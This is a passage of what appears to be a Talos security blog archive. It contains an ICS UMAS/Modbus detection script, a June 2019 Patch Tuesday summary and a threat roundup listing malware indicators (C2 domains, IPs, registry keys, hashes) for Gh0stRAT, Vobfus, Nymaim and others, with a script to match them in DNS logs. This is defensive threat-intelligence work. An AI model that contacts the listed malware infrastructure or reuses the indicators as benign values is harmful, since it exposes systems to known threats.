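    # read holding registers (fc 0x03) from an HMI: ordinary Modbus, ignored
    ("10.0.0.20", bytes.fromhex("00010000000601030000000a")),
    # UMAS fc 0x6d from the approved engineering workstation: allowed
    ("10.0.0.10", bytes.fromhex("000200000004005a006d")),
    # UMAS fc 0x28 from an unknown host: alert (TALOS-2019-0764)
    ("10.0.0.77", bytes.fromhex("000300000004005a0028")),
    # MBAP length field claims 9 bytes but only 2 follow: malformed
    ("10.0.0.78", bytes.fromhex("000400000009005a")),
    # UMAS fc 0x01 from an unknown host: not a watched code, ignored
    ("10.0.0.77", bytes.fromhex("000500000004005a0001")),
    # UMAS frame with only the session byte: truncated
    ("10.0.0.79", bytes.fromhex("000600000003005a00")),
]

if __name__ == "__main__":
    for alert in scan(SAMPLE_EVENTS, ENGINEERING_HOSTS):
        print(alert)
```

In practice the (source, frame) pairs come from a span port or tap in front of the controller, and a hit is a lead to correlate with change-control records, not a verdict on its own; the Snort rules listed above remain the supported detection for these advisories.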

How Cisco Talos helped Howard County recover from a call center attack


On Aug. 11, 2018, the 911 non-emergency call center in Howard County, Maryland was in crisis — not for the types of calls flooding into dispatchers, but simply for the sheer numbers. The center, which usually receives 300 to 400 calls a day, was now getting 2,500 in a 24-hour span of time. The center, which takes calls for everything from home security alarms going off to cats getting stuck in trees, was overwhelmed. What was going on?

James Cox, a network-server team manager for the Howard County government, was tasked with answering that question. It turns out, a lone foreign actor created this crisis. “The phone system doesn’t care who you are,” Cox explained. “You hit that 10-digit number and the phone rings. There’s no check and there’s no balance.”

At this point, Howard County called on Cisco Talos for assistance. Cox talked about the lessons he learned from this during the second annual Talos Threat Research Summit, a sold-out one-day conference for security professionals who are also attending Cisco Live.

Read the complete story over at the Cisco Newsroom here.

Microsoft Patch Tuesday — June 2019: Vulnerability disclosures and Snort coverage


Microsoft released its monthly security update today, disclosing a variety of vulnerabilities in several of its products. The latest Patch Tuesday covers 88 vulnerabilities, 18 of which are rated “critical," 69 that are considered "important" and one "moderate." This release also includes a critical advisory regarding security updates to Adobe Flash Player.

This month’s security update covers security issues in a variety of Microsoft’s products, including the Chakra scripting engine, the Jet database engine and Windows kernel. For more on our coverage of these bugs, check out the Snort blog post here, covering all of the new rules we have for this release.

Critical vulnerabilities

Microsoft disclosed 19 critical vulnerabilities this month, 10 of which we will highlight below.

CVE-2019-0988, CVE-2019-0989, CVE-2019-0991, CVE-2019-0992, CVE-2019-0993, CVE-2019-1002, CVE-2019-1003 and CVE-2019-1024 are all memory corruption vulnerabilities in the Chakra scripting engine. An attacker could exploit any of these bugs by tricking a user into visiting a specially crafted, malicious website while using the Microsoft Edge browser. If successful, the attacker could then corrupt memory in such a way that would allow them to take control of an affected system.

CVE-2019-0620 is a remote code execution vulnerability in Windows Hyper-V that exists when Hyper-V fails to properly validate input on a host server from an authenticated user using a guest operating system. An attacker could exploit this bug by running a specially crafted application on a guest operating system that could cause the Hyper-V host operating system to execute arbitrary code.

CVE-2019-0888 is a remote code execution vulnerability that exists in the way ActiveX Data Objects handles objects in memory. An attacker could exploit this vulnerability by tricking the user into visiting a specially crafted, malicious website. If successful, the attacker could then execute code in the context of the current user.

The other critical vulnerabilities are:

                Important vulnerabilities

                This release also contains 65 important vulnerabilities, one of which we will highlight below.

                CVE-2019-1065 is an elevation of privilege vulnerability that occurs when the Windows kernel improperly handles objects in memory. An attacker would first have to log onto the system in order to exploit this vulnerability, and then run a specially crafted application to take control of the system. They would then have the ability to run arbitrary code in kernel mode.

                The other important vulnerabilities are:


                Moderate vulnerability

                There is one moderate vulnerability, CVE-2019-0948, which is an information disclosure vulnerability in Windows Event Manager.

                Coverage 

                In response to these vulnerability disclosures, Talos is releasing the following SNORTⓇ rules that detect attempts to exploit them. Please note that additional rules may be released at a future date and current rules are subject to change pending additional information. Firepower customers should use the latest update to their ruleset by updating their SRU. Open Source Snort Subscriber Rule Set customers can stay up-to-date by downloading the latest rule pack available for purchase on Snort.org.

                Snort rules: 44813-44814, 48051-48052, 49762-49765, 50162-50163, 50183-50184, 50198-50199, 50357-50376, 50393-50408, 50411-50414

                Threat Roundup for June 7 to June 14


                Today, Talos is publishing a glimpse into the most prevalent threats we've observed between June 07 and June 14. As with previous roundups, this post isn't meant to be an in-depth analysis. Instead, this post will summarize the threats we've observed by highlighting key behavioral characteristics, indicators of compromise, and discussing how our customers are automatically protected from these threats.

                As a reminder, the information provided for the following threats in this post is non-exhaustive and current as of the date of publication. Additionally, please keep in mind that IOC searching is only one part of threat hunting. Spotting a single IOC does not necessarily indicate maliciousness. Detection and coverage for the following threats is subject to updates, pending additional threat or vulnerability analysis. For the most current information, please refer to your Firepower Management Center, Snort.org, or ClamAV.net.

                For each threat described below, this blog post only lists 25 of the associated file hashes and up to 25 IOCs for each category. An accompanying JSON file can be found here that includes the complete list of file hashes, as well as all other IOCs from this post. As always, please remember that all IOCs contained in this document are indicators, and one single IOC does not indicate maliciousness.
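The domain and IP tables in this roundup are written in defanged form (`ns1[.]helpchecks[.]com`) so that the values never become live links, which means they have to be normalized before they can be searched for. The script below is an added example, not Talos tooling: it refangs a constructed excerpt of the tables, splits it into domains and IPs, and runs the result over constructed resolver log lines (the dnsmasq-style `query[A] name from client` / `reply name is ip` format is an assumption), treating a subdomain of a listed domain as a hit. Each hit is a lead for a hunt, in keeping with the caveat above that a single IOC does not establish maliciousness.

```python
import re

# Constructed excerpt in the roundup's defanged notation; the real tables
# above are the source of truth for the full lists.
ROUNDUP_IOCS = """
ns1[.]helpchecks[.]com
ns1[.]helpcheck1[.]org
jexzc[.]in
66[.]220[.]23[.]114
216[.]218[.]206[.]69
"""

IPV4_RE = re.compile(r"\d{1,3}(?:\.\d{1,3}){3}")
# Assumed dnsmasq-style log lines; adjust the patterns for another resolver.
QUERY_RE = re.compile(r"query\[\w+\] (\S+) from (\S+)")
REPLY_RE = re.compile(r"reply (\S+) is (\S+)")


def refang(value: str) -> str:
    """Turn 'a[.]b' back into 'a.b', lower-cased, trailing dot removed."""
    return value.strip().replace("[.]", ".").lower().rstrip(".")


def load_iocs(text: str):
    """Split a defanged indicator list into (domains, ips) sets."""
    domains, ips = set(), set()
    for line in text.splitlines():
        if not line.strip():
            continue
        value = refang(line)
        (ips if IPV4_RE.fullmatch(value) else domains).add(value)
    return domains, ips


def domain_hit(name: str, domains: set):
    """Return the listed domain that name equals or is a subdomain of."""
    parts = name.split(".")
    for i in range(len(parts) - 1):  # never test the bare TLD
        candidate = ".".join(parts[i:])
        if candidate in domains:
            return candidate
    return None


def match_log(lines, domains, ips):
    """Scan resolver log lines; return one dict per indicator hit."""
    hits = []
    for n, line in enumerate(lines, 1):
        m = QUERY_RE.search(line)
        if m:
            hit = domain_hit(refang(m.group(1)), domains)
            if hit:
                hits.append({"line": n, "kind": "domain",
                             "indicator": hit, "client": m.group(2)})
            continue
        m = REPLY_RE.search(line)
        if m and m.group(2) in ips:
            hits.append({"line": n, "kind": "ip",
                         "indicator": m.group(2), "name": m.group(1)})
    return hits


# Constructed log lines; the name-to-address pairings are invented.
SAMPLE_LOG = [
    "Jun 14 10:02:11 gw dnsmasq[612]: query[A] ns1.helpchecks.com from 192.168.1.50",
    "Jun 14 10:02:11 gw dnsmasq[612]: reply ns1.helpchecks.com is 216.218.206.69",
    "Jun 14 10:03:40 gw dnsmasq[612]: query[A] updates.example.com from 192.168.1.51",
    "Jun 14 10:05:02 gw dnsmasq[612]: query[A] www.jexzc.in from 192.168.1.52",
    "Jun 14 10:05:02 gw dnsmasq[612]: reply www.jexzc.in is 66.220.23.114",
]

if __name__ == "__main__":
    domains, ips = load_iocs(ROUNDUP_IOCS)
    for hit in match_log(SAMPLE_LOG, domains, ips):
        print(hit)
```

The JSON file linked above is the better input for `load_iocs` than a hand-copied excerpt, and the reply-line matches are worth keeping separate from query matches: a client name is only attached to the query, so an IP hit still has to be joined back to the host that asked.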

                The most prevalent threats highlighted in this roundup are:

                • Win.Trojan.Gh0stRAT-6993126-0
                  Trojan
                  Gh0stRAT is a well-known family of remote access trojans designed to provide an attacker with complete control over an infected system. Capabilities include monitoring keystrokes, collecting video footage from the webcam, and uploading/executing follow-on malware. The source code for Gh0stRAT has been publicly available on the Internet for years, significantly lowering the barrier for actors to modify and reuse the code in new attacks.
                   
                • Win.Worm.Vobfus-6992861-0
                  Worm
                  Vobfus is a worm that copies itself to external drives and attempts to gain automatic code execution via autorun.inf files. It also modifies the registry so that it will launch when the system is booted. Once installed, it attempts to download follow-on malware from its command and control (C2) servers.
                   
                • Win.Dropper.Nymaim-6992731-0
                  Dropper
                  Nymaim is malware that can be used to deliver ransomware and other malicious payloads. It uses a domain generation algorithm to generate potential command and control (C2) domains to connect to additional payloads.
                   
                • PUA.Win.Adware.Qjwmonkey-6992589-0
                  Adware
                  Qjwmonkey is adware that modifies the system and browser settings to display advertisements to the user.
                   
                • Win.Packed.NjRAT-6992540-1
                  Packed
                  njRAT, also known as Bladabindi, is a remote access trojan (RAT) that allows attackers to execute commands on the infected host, log keystrokes and remotely turn on the victim's webcam and microphone. njRAT was developed by the Sparclyheason group. Some of the largest attacks using this malware date back to 2014.
                   
                • Win.Malware.Tofsee-6992280-0
                  Malware
                  Tofsee is multi-purpose malware that features a number of modules used to carry out various activities, such as sending spam messages, conducting click fraud, mining cryptocurrency, and more. Infected systems become part of the Tofsee spam botnet and are used to send large volumes of spam messages in an effort to infect additional systems and increase the overall size of the botnet under the operator’s control.
                   
                • Win.Malware.Yobrowser-6992453-0
                  Malware
                  Yobrowser is adware that typically masquerades as cracked versions of legitimate software.
                   

                Threats

                Win.Trojan.Gh0stRAT-6993126-0


                Indicators of Compromise


                Registry KeysOccurrences
                <HKCU>\Software\Microsoft\Windows Script Host\Settings 26
                MutexesOccurrences
                guduyinan.gnway.net6
                127.0.0.12
                soiufnrfjowieursmpwoeirfujaiurvnapoai39w452
                y927.f3322.org2
                ddos-cc.vicp.cc2
                192.168.1.1002
                linchen1.3322.org2
                \BaseNamedObjects\linchen1.3322.org2
                119.98.51.1291
                115.28.32.1381
                203.156.199.111
                q727446006.gicp.net1
                zy520.f3322.org1
                169.254.22.151
                118.244.153.461
                121.199.6.2421
                192.168.1.681
                850967012.f3322.org1
                169.254.25.1001
                a678157.oicp.net1
                192.168.0.131
                192.168.0.1011
                cfhx.f3322.org1
                xueyang22.gicp.net1
                \BaseNamedObjects\www.touzi1616.com1
                See JSON for more IOCs
                IP Addresses contacted by malware. Does not indicate maliciousnessOccurrences
                118[.]5[.]49[.]62
                197[.]4[.]4[.]122
                115[.]28[.]40[.]122
                49[.]2[.]123[.]562
                118[.]244[.]185[.]1132
                116[.]255[.]131[.]1452
                174[.]128[.]255[.]2451
                189[.]163[.]17[.]51
                54[.]76[.]135[.]11
                188[.]5[.]4[.]961
                61[.]142[.]176[.]231
                27[.]9[.]199[.]2171
                110[.]251[.]189[.]651
                114[.]239[.]19[.]1011
                222[.]186[.]27[.]2161
                115[.]28[.]44[.]1161
                123[.]131[.]15[.]1091
                120[.]9[.]228[.]61
                119[.]98[.]51[.]1291
                101[.]16[.]198[.]981
                203[.]156[.]199[.]111
                115[.]28[.]32[.]1381
                169[.]254[.]22[.]151
                121[.]199[.]6[.]2421
                118[.]244[.]153[.]461
                See JSON for more IOCs
                Domain Names contacted by malware. Does not indicate maliciousnessOccurrences
                guduyinan[.]gnway[.]net5
                y927[.]f3322[.]org2
                ddos-cc[.]vicp[.]cc2
                linchen1[.]3322[.]org2
                xm974192128[.]3322[.]org1
                guduyinan[.]gnway[.]com1
                278267882[.]f3322[.]org1
                a3328657[.]f3322[.]org1
                www[.]touzi1616[.]com1
                jie0109[.]hackxd[.]net1
                zy520[.]f3322[.]org1
                q727446006[.]gicp[.]net1
                850967012[.]f3322[.]org1
                a678157[.]oicp[.]net1
                cfhx[.]f3322[.]org1
                xueyang22[.]gicp[.]net1
                Files and or directories createdOccurrences
                %TEMP%\jnbxmapdsg.vbs1
                %TEMP%\rlzocrfujx.vbs1
                %TEMP%\bvjkzncqf.vbs1
                %TEMP%\mxoejtdhe.vbs1
                %TEMP%\ofcspybli.vbs1
                %TEMP%\imopeshvj.vbs1
                %TEMP%\paybqnqnd.vbs1
                %TEMP%\ntvxzbqf.vbs1
                %TEMP%\rvxmapdsgv.vbs1
                %TEMP%\dkaqshjynd.vbs1
                %TEMP%\vbdsgvjy.vbs1
                %TEMP%\noqftiwlzo.vbs1
                %TEMP%\ovxncegixm.vbs1
                %TEMP%\qhxurnkcs.vbs1
                %TEMP%\eyaodrgujx.vbs1
                %TEMP%\zyvhdvlis.vbs1
                %TEMP%\zdrshixlao.vbs1
                %TEMP%\waoqethv.vbs1
                %TEMP%\ulabqeth.vbs1
                %TEMP%\othjxmapd.vbs1
                %TEMP%\zdeguvky.vbs1
                %TEMP%\gzgjxmoqeg.vbs1
                %TEMP%\fqwzqhkh.vbs1
                %TEMP%\ulabqrguix.vbs1
                %TEMP%\vrfxlaods.vbs1
                See JSON for more IOCs
                File Hashes
                • 0477c2b9ba7eecc8b0827400576860257e62a306a3e0c310eb84c537ec47e018
                • 13287e727a2be4b6a3533e768b4babfd9191ec65002abcdf77c43e69278963be
                • 1d7633311c1f671c60422a4d6723aa10a37e833e2d5df732f3988b3e379b2ee9
                • 2a38fbbcef4bc83582ccd98c9bf96ff29e4c915d90802ec799420420f2cad6e6
                • 2b19de056a388d0ee3672be895f4e446c42053034c68675585dd3fb54b8d1eb7
                • 3821a10495fb4759fbab1ef7868eeb1e207ea6bf4211370f072b0215a14b46c8
                • 3ae58dca3ce80c3ed4b65f610eee921dbeb3343619caace78c6afe21ec237f08
                • 3d54f0fbd50f0b91f635a9ecc89ef8cb58c021bb60326b5fa2db75989d1bff5a
                • 3fdd3b5333f7e526e80599add12fdeef663c59ad79ef4e714912043038377730
                • 47c349433e77aefb18ea384f6ab4759f7bd49466f7a747255d19d4648fecc762
                • 49752684078dfa74cd25adbbdc9bbf7a98e6f96f5355cd52b8b77738506673e7
                • 4e5a282c7230242d090844875c9f5c432dc2c4bad3ba13fa2a7df86843785f75
                • 53e08241abdfe3f13d6aa875642638d1badc6ec59cdb9757fe0fd598dc736927
                • 57fc8d1737521cb0af37fcf70079603dc0eb5da1b3bbef9bad334dfe79176068
                • 5ba20f4aaf94b4f418501ae977d1f6cf947accf8134c3b9487b42cdd65ef715b
                • 5fab1a54d1338b2cb906aae3b2f5292d47445aae2af383c2a0e99b4ccf863262
                • 60f6548844d59e59dc90a12fcb97396793c20687947a6eb5cc543debecf607d1
                • 61caab6c70480cd6db4f33234cfc86467bff26c2e19b804211be8c822218a940
                • 623fbdc46be1a797f743894e3e1cc003a29692d6fb9b3246de80282207d99b9c
                • 63746003a0c8fcdf11f9367ca5102c8413ee5e2cd298079de5a3ab0ba5493ea7
                • 66b770d0d2e02739e0495d30f9f56c717989eec3f1da96c7ffa01b05deffeb37
                • 68d644144b33f4766a3e11a33c471cf877d5801e1833d1d1813d4a06125ff2a9
                • 6a820f70fc59abd8d0b5202de65a9fc51312d18322e55b24d1f63a2339ff13d3
                • 6cb616c3229fd37e2615de709496215cc9138436b16eab265e9feae9d81cfac2
                • 6ed77af0d3929a62256c7aac5068ff7ca337460cb813863d7c528e95f503cc59
                • See JSON for more IOCs

                Coverage


                Screenshots of Detection

                AMP




                ThreatGrid



                Win.Worm.Vobfus-6992861-0


                Indicators of Compromise


                Registry KeysOccurrences
                <HKLM>\SOFTWARE\POLICIES\MICROSOFT\WINDOWS\WindowsUpdate 25
                <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\ADVANCED
                Value Name: ShowSuperHidden
                25
                <HKLM>\SOFTWARE\WOW6432NODE\Policies 25
                <HKLM>\SOFTWARE\Wow6432Node\Policies\Microsoft\Windows\WindowsUpdate\AU 25
                <HKLM>\SOFTWARE\POLICIES\MICROSOFT\WINDOWS\WINDOWSUPDATE\AU 25
                <HKLM>\SOFTWARE\POLICIES\MICROSOFT\WINDOWS\WINDOWSUPDATE\AU
                Value Name: NoAutoUpdate
                25
                <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
                Value Name: jauxec
                1
                <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
                Value Name: qiusooj
                1
                <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
                Value Name: mokiy
                1
                <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
                Value Name: wiiorit
                1
                <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
                Value Name: kuivuo
                1
                <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
                Value Name: viezus
                1
                <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
                Value Name: fonef
                1
                <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
                Value Name: znxaaq
                1
                <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
                Value Name: reiiraj
                1
                <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
                Value Name: wauul
                1
                <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
                Value Name: wlcug
                1
                <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
                Value Name: wzzuf
                1
                <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
                Value Name: laociek
                1
                <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
                Value Name: tioila
                1
                <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
                Value Name: tstoj
                1
                <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
                Value Name: yeeuqov
                1
                <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
                Value Name: vyjuos
                1
                <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
                Value Name: zeuub
                1
                <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
                Value Name: teozuim
                1
                MutexesOccurrences
                \BaseNamedObjects\A25
                IP Addresses contacted by malware. Does not indicate maliciousnessOccurrences
                216[.]218[.]206[.]691
                Domain Names contacted by malware. Does not indicate maliciousnessOccurrences
                ns1[.]helpchecks[.]com25
                ns1[.]helpchecks[.]info25
                ns1[.]helpchecks[.]at25
                ns1[.]helpchecks[.]eu25
                ns1[.]helpchecks[.]by25
                ns1[.]helpcheck1[.]org25
                ns1[.]helpcheck1[.]com25
                ns1[.]helpcheck1[.]net25
                Files and or directories createdOccurrences
                \??\E:\autorun.inf25
                \autorun.inf25
                \??\E:\System Volume Information.exe25
                \System Volume Information.exe25
                \$RECYCLE.BIN.exe25
                \??\E:\$RECYCLE.BIN.exe25
                \Secret.exe25
                \??\E:\Passwords.exe25
                \??\E:\Porn.exe25
                \??\E:\Secret.exe25
                \??\E:\x.mpeg25
                \Passwords.exe25
                \Porn.exe25
                \Sexy.exe25
                %HOMEPATH%\Passwords.exe25
                %HOMEPATH%\Porn.exe25
                %HOMEPATH%\Secret.exe25
                %HOMEPATH%\Sexy.exe25
                \??\E:\Sexy.exe24
                %HOMEPATH%\Passwords.exe (copy)24
                %HOMEPATH%\Porn.exe (copy)24
                %HOMEPATH%\RCX1.tmp24
                %HOMEPATH%\RCX2.tmp24
                %HOMEPATH%\RCX3.tmp24
                %HOMEPATH%\RCX4.tmp24
                See JSON for more IOCs
                File Hashes
                • 03f2507d1db297b7176fddce8540639e2a8986045af7d4cf27b09a424629a08d
                • 181896288ffa6cfea0d847eda1cbce7462fbdfbf6536c6b6d874155f8d23058c
                • 366c47a2774078e135f48b03f4facbbba80aa4e294d523f0112d1cf001a93e4a
                • 59570b2c73227359544e6c7fde4ba2368170ca48482cdb530de097bb833c177d
                • 5a8e8c501cc8864d928beddb8837e0ce70f272a9a6ae13d175dfcbe52d2f3d7e
                • 5b4ebc908f6cff3ad1acc262790b3b7ad1e2e65031c7b0f8c55f700ae499f40d
                • 5c314363a05429b3a76149ed8a0ab9b9342b69d76794ba9d02e3ab09092ff4ad
                • 5f06f5540689bd9346ae76995c25e8efd60d10c22ec9f6723cd6467dabd0b78e
                • 60398eff74f6a02cd6dad118d7dc028102b56b20dc6ff7bc0c383b6accdac8e9
                • 60b898046d99e11912349e895685616d5c59a1d0e6d05fa23fdb654a96c67931
                • 62070e7ac4e86195d915ffecd132823e178fb7eaad331fea65926fa2bb80f23b
                • 6b63b301a133703b5a6fe3c99c4e2c5a421490daf2a26682a83b95b1eaecb186
                • 71999972c8bd0259bab9d76a6e2d9525a141ad7ba151d0b8bf77876b6d6660c7
                • 7271cb745dcca0d0bb516b7ff4cd69d2c5c261df33e48091890450ca789ae081
                • 753c11420e4a06bcb790a51918923c564c6da62c46d923eeb3541e342667a453
                • 75a188c634a0c857220ee7c6ad848293ec08d1d8a9f6027f39a02194665edffe
                • 7da2c1a73cfa87b1a66d4c0bbe2b1b18ae7540e3ae4de407092fe5f56a44d772
                • 80107ca033df25818e9bb64aed5f088c98b4c75d8a3ed3d3a47bb0f2660a2b2d
                • 8b76268bc5255134ff460ee3356797657f98f8a0cc6fef98d0e173e367b6734b
                • 92944feb88a896a922c9a88fef2683e864b931fd919c4405eeab4ed6cc2a7e02
                • a3b82b5badf315c723973a8e8d8441351a6aea76541d888bdf1db29fd4b3721b
                • ae5a2a2a0cd106146aa40390596bba6c72fa7d8c75ab237b3cbb040946fcac19
                • afb4401b564b6330f107b4a8d95e7d28429957929140a84ee99f01eae3fc5619
                • b3f564ef2e4550601f2728da6eec584fadcb7b5060a0df91ed2cbf4e306c5189
                • c80909dfb38fc5646008338b31bf576275d59c5880403adc8e5bb072eec9ce1b
                • See JSON for more IOCs

                Coverage


                Screenshots of Detection

                AMP



                ThreatGrid



                Umbrella



                Win.Dropper.Nymaim-6992731-0


                Indicators of Compromise


                Registry KeysOccurrences
                <HKCU>\Software\Microsoft\GOCFK 24
                <HKCU>\SOFTWARE\MICROSOFT\GOCFK
                Value Name: mbijg
                24
                MutexesOccurrences
                Local\{369514D7-C789-5986-2D19-AB81D1DD3BA1}24
                Local\{D0BDC0D1-57A4-C2CF-6C93-0085B58FFA2A}24
                Local\{F04311D2-A565-19AE-AB73-281BA7FE97B5}24
                Local\{F6F578C7-92FE-B7B1-40CF-049F3710A368}24
                Local\{306BA354-8414-ABA3-77E9-7A7F347C71F4}24
                Local\{F58B5142-BC49-9662-B172-EA3D10CAA47A}24
                Local\{C170B740-57D9-9B0B-7A4E-7D6ABFCDE15D}24
                Local\{764A5E5B-9D8B-4E3E-3AE5-6BA089B04B34}24
                Local\{D6E0445C-66CF-7E18-EE4D-5700342376D0}24
                IP Addresses contacted by malware. Does not indicate maliciousnessOccurrences
                66[.]220[.]23[.]11424
                64[.]71[.]188[.]17818
                184[.]105[.]76[.]25018
                Domain Names contacted by malware. Does not indicate maliciousnessOccurrences
                jexzc[.]in24
                nenpzs[.]com23
                Files and or directories createdOccurrences
                %ProgramData%\ph24
                %ProgramData%\ph\fktiipx.ftf24
                %TEMP%\gocf.ksv24
                %TEMP%\fro.dfx23
                \Documents and Settings\All Users\pxs\pil.ohu23
                %LOCALAPPDATA%\giy4vh35
                %APPDATA%\io77x5
                %LOCALAPPDATA%\av1165d5
                %APPDATA%\tv25
                %ProgramData%\0c74
                %LOCALAPPDATA%\g8164
                %APPDATA%\p3f4
                %LOCALAPPDATA%\r4v2rp4
                %APPDATA%\3w74
                %ProgramData%\3e9sq3
                %ProgramData%\qi393
                %LOCALAPPDATA%\yp870bk3
                %ProgramData%\4b8s23
                %ProgramData%\q8216p3
                %ProgramData%\94z2
                %ProgramData%\igzk42
                %LOCALAPPDATA%\ycq1ac2
                %APPDATA%\867j2
                %ProgramData%\9d0g92
                %ProgramData%\0186d9m2
                See JSON for more IOCs
                File Hashes
                • 08beb94545dabf135ef630b432f00fc603f3797328b5a9681d9d1a8041238147
                • 0be51b6a0e11b6d807c4e6d2eea49b0c9e60c23babbb48ff17c27ee2e2050eef
                • 0fee18d7562b359c642e4a953d08251b36c3971f8fc9dbfce46af98fe26f04e8
                • 160fb874c1e78de9cb2e7d6a829e5f1e40aba2edae9de7a274a9639b80b6df9d
                • 17b5939fc77e2acb9a76c9baa6c4de01822ef4633da4732a49c4cd26f2ff024c
                • 1bef5f7889b5b8528bd9f20d6218dd4faa6ff70ad60cfd182e80374045ff9faf
                • 281bae2b93ae03725217deac68fd1f513d0a0267dda486e4d2d51f92044c8fca
                • 41d57f15b7c1ffd1c4bc5af862da97963405eace4c67574d68fcd39eb4dbe6c0
                • 44b688082d3305d8e0d29bf7d6d78b60078592f1bda83a90ec6d227823d0e297
                • 4cde92c748f5aa5912a83d075dae2241de2496d4f4cf8e69a04a65c2080ff0b8
                • 507340f713f0c6f4172253b20bab21bdc6dbdd7ad4866d037894acdf167c60dc
                • 50a3f7c98b739d33ff4ba7b3ef38e553a42d7b47bc8b34f2d877055da9eaa1e9
                • 514affb7cd921abb88040abc8beb7af9139488da9f625dfb8647fdab665c38c5
                • 5bf35c74cfc5908e266e3d59615a16b30eb9b6de68759fe346257b420edf6748
                • 67989a565971fbe6f02c909b0696edc0de6ec1234129c4df4455a1f63a702189
                • 69f167f13f7e93a17d8dfaf59eb97014aa1446db339e300982aa8dc5ca3f14e3
                • 70e414e8f7895b3ed7dec9e71693f1f8ca9ad6421fe9b3c0d38280cdb1c4608a
                • 74bb6e3a0ddaf3f2d7ad6e12513004c6efd77ad6a21f2faeef0fedd214f5f3fc
                • 74d43a9e8803c815e03184619fe2ea10029e8db22c68a24290495b506fcea48e
                • 7b6a3b68714b06b9f749a20c22461ff0c7e0759f7a5ca8d51e318dec2d88be51
                • 7eb6295c6f70a823a6a02f1728cb16827c545737e0b7a0a5a1cb06ebbcf965a5
                • 82c92424c692ee6769d9e2f3e9e9accf5c45794cd27b95a68f507eff88850a98
                • 83929ceb3274a34650127a4cb9ccac5b5bcb559fd43f39b6b64081bd3255dccb
                • 8c665d48bddc2f4436223689fd97f11790481f8df7f0e4c91af31aed0b4a4711
                • 91e25ed856ffb9ea7cea06e4de5e5eb689063324e9268730e03cd34f4dc3ee68
                • See JSON for more IOCs

                Coverage


                Screenshots of Detection

                AMP



                ThreatGrid



                PUA.Win.Adware.Qjwmonkey-6992589-0


                Indicators of Compromise


                Registry Keys | Occurrences
                N/A | -
                Mutexes | Occurrences
                ATL:MemData03EAPC | 10
                \BaseNamedObjects\ATL:MemData03EA899552 | 1
                \BaseNamedObjects\ATL:MemData03EA830021 | 1
                \BaseNamedObjects\ATL:MemData03EA841675 | 1
                \BaseNamedObjects\ATL:MemData03EA358075 | 1
                \BaseNamedObjects\ATL:MemData03EA675052 | 1
                \BaseNamedObjects\ATL:MemData03EA134349 | 1
                \BaseNamedObjects\ATL:MemData03EA414408 | 1
                \BaseNamedObjects\ATL:MemData03EA124406 | 1
                \BaseNamedObjects\ATL:MemData03EA651689 | 1
                \BaseNamedObjects\ATL:MemData03EA172892 | 1
                IP Addresses contacted by malware. Does not indicate maliciousness | Occurrences
                47[.]102[.]38[.]15 | 10
                39[.]108[.]27[.]173 | 9
                47[.]95[.]181[.]45 | 2
                36[.]99[.]227[.]233 | 1
                Domain Names contacted by malware. Does not indicate maliciousness | Occurrences
                x[.]93ne[.]com | 10
                cdn[.]zry97[.]com | 1
                Files and or directories created | Occurrences
                %System32%\d3d9caps.dat (copy) | 10
                %System32%\d3d9caps.tmp | 10
                %APPDATA%\GlobalMgr.db | 10
                File Hashes
                • 068eda364702ce61530d3b06ff1edb490fa157572ebf936ad9ad0d913c44e46d
                • 0c748be9a32bc9ce08709f67a45fc9e3e76a06b6e30091ea6e75014651449bd6
                • 1211299848ddadcaefe019ade6a5394a744297e5fbe8182d0156faffe2f40e34
                • 275b0dad9af4cad57d9fe546b7f8c11e55b848b2ca68959bbe8d45fc3195a85b
                • 326d9df48f47cad42b8a6bac64061b9e2592d62ad5c8fd2a727865f84a79b6c9
                • 32a0d53d2716251728d4120e5cceb4eb8894fd830841d9476820cd868420d37a
                • 6f5854d4dce3170393d74fb216573d08b694d7ec2982f02d3e46fe34b3ba0ed7
                • 70ab5cb1653e39937408d71b70c9bd3952c572a2b54bc2b039794130efe5ae77
                • 8da41212571b8b910ec657bc8f1b67ef22dd3c15e40280d5c6f93a5104227c0f
                • 90a457c02c2e659902d1be908c53c38eec47574101f14477c22ec87968b5b870
                • 9ae31bf1c30051d3438f3548d5f7593c24aa9297cb9f89b26b04d01482f77622
                • 9dcb833bbac2d4fabafe49babb53b127349be1ee1444031cccb77d2752206813
                • c3e2f2e2e17f0408b11bd9cc8dc3ea97364fec6d3dea07ba896901d24f89fef4
                • c48b5755d64f2fa9fe6bdeec4605d5352e196db78d507608fc9f181be93f9da1
                • c4e26e43528d8be9dba86a1b7c30b4ef8bdca67b56bbcab2d7fc76cb12004b14
                • c88992429426ed40e4a5ff37c0ff0b3ecdb52a07f7e6b4b2377a6c4160263419
                • d29b9fa55f21577991f220bec9bbc89969e843b6b03f7dad0084e80b86961c97
                • d2bcb4e712ee873f8cce82a2783b84bf2a11f275e9064581cf00fd88323e803d
                • dace1d73cd93785decdc4993f12de1b214b0a836539063c5fac8b154ce948eb1
                • db55da939400d9d718b39e20280da3317cd1d35a522ec4927b059fefea4aa754
                • df38320eb4d1eedf53b9927cb734bf2506e3d38d04c9279e65aea08391bc6caa
                • e8a913bb3211a926e04ce387dadf74d262e287070ad08192153b4a07f8914544
